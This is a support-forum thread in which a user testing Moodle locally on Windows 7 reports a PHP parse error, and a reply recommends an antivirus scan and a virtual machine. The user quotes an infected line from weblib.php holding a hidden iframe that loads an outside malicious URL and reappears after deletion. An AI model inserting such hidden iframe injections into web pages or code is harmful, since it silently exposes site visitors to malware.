Dear expert,

I'm trying to install and test using moodle in my laptop (localhost) before install it in my real website. I'm using win7. When I go to my moodle directory, then redirect to http://localhost/moodle/install.php, and a massage appeared:

---
Parse error: parse error in C:\xampp\htdocs\moodle\lib\weblib.php on line 3004
---

And I think it's a problem of my operating system.
Because when I try to open the line above, I found :

---
$output .= "\n</div>\n<iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe>
---

after I search internet, the web is a virus.

I've tried to delete the "<iframe.../iframe>" text, and saved it.
but when I try to open my moodle directory, the problem still happen.
then I check the line 3004, the text "<iframe.../iframe>" appear again..

I really want to know, how to clean my laptop from that internet virus..

thanks for your help...
any comment will be appreciated
thanks..

Hi,

Sounds like your in a bit of pickle.

Download a free virus checker like Avast or something if you don't have any Antivirus and clean up your machine. Even Nortons would have a free version of their software to trial. So clean your notebook is going to be the first step.

If you are testing moodle and installing it locally, I found the best thing to do is running it inside a virtual machine (sounds complicated, but its as easy as hitting play smile No setup problems or anything and well worth it to run tests on.

Get it here; http://tracker.moodle.org/browse/MDLSITE-368

Regards,

Patrick
